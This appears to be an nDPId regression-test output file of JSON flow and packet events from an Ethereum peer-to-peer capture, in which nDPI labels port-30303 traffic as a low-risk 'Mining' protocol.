00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"}
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"}
00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACymwlAACMRP1cS26efwKgBuHZfdl8AnsFrVj4puAH6ZgARKbHJmno0oUTDSx6ME3WyQvgYFdLFf82IMxF0n+9n2kTCv9WKp0W5OWAeoQIHesUQlOhBZUox8XuUKjSw2r\/cLxIh6clEUwjRudwx4mptlXU2a3WMaDxBAALzy4RPFs69gun3gnZfoAez3OWZbA2U21K6mmqEcXi9Zewq23MX\/wTlxWTRncmbhF4WIGEK"}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -248,187 +248,187 @@
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"}
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"}
00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
